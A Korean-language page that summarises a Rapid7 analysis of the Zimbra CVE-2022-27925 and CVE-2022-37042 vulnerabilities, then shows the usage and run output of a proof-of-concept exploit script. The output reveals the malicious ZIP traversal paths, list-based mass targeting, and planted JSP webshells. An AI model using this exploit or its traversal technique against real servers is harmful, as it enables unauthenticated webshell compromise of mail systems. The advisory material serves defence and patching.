
PoC
2022년 5월 10일, Zimbra는 Zimbra Collaboration Suite의 여러 취약점을 해결하기 위해 9.0.0 패치 24 및 8.8.15 패치 31 버전을 출시했습니다. 여기에는 CVE-2022-27924(이전에 작성한 글) 및 CVE-2022-27925가 포함됩니다.
처음에 Zimbra는 CVE-2022-27925를 인증된 경로 탐색 공격으로 분류했습니다. 관리 사용자가 Zimbra 계정 권한으로 파일 시스템의 모든 디렉터리에 파일을 쓸 수 있는 취약점이었습니다. 처음에는 관리자만 공격할 수 있다고 여겨졌기 때문에 NVD는 CVSS 기본 점수 7.8을 부여했습니다. 이후 Volexity는 이 취약점을 악용하는 공격자들이 관리자 권한 요구 사항을 우회하는 방법을 찾았음을 발견하고 2022년 8월 10일에 이에 대해 작성했습니다. 이 새로운 인증 우회에는 CVE-2022-37042라는 새로운 식별자가 부여되었습니다.
원래의 경로 탐색 취약점과 새로운 인증 우회를 결합하면, 공격자는 관리자 포트(기본값 7071)를 통해 익명으로 Zimbra Collaboration Suite 시스템을 원격으로 손상시킬 수 있습니다. 최근에 우리가 글을 쓰고 익스플로잇을 작성한 아직 패치되지 않은 권한 상승 취약점과 결합하면, 이 세 가지 취약점은 패치되지 않은 시스템에서 루트 사용자로 원격 코드 실행으로 이어집니다.
공개 권고에는 언급되지 않았지만, 우리의 분석에 따르면 Zimbra Collaboration Suite Network Edition(유료 버전)은 취약하며 Open Source Edition(무료 버전)은 취약하지 않습니다(취약한 mboximport 엔드포인트가 없기 때문입니다). 취약한 버전은 다음과 같습니다:
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (및 이전 버전)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (및 이전 버전)
이러한 취약점(및 Zimbra의 다른 취약점)은 실제 환경에서 광범위한 악용 대상이 되고 있으므로 가능한 한 빨리 패치하거나 오프라인으로 전환해야 합니다. 손상되었다고 의심되는 경우, Zimbra는 데이터 손실 없이 최신 패치로 Zimbra Collaboration Suite 서버를 처음부터 재구축하는 방법을 제공합니다.
출처: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
usage: exploit.py [-h] [-t TARGET] [-l LIST]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URl with protocol HTTPS
-l LIST, --list LIST List of targets
root@root# python exploit.py -t zimbra.example.com
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925 Sanan Qasim
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
root@root# python exploit.py -l targets.txt
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925 sanan Qasim
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable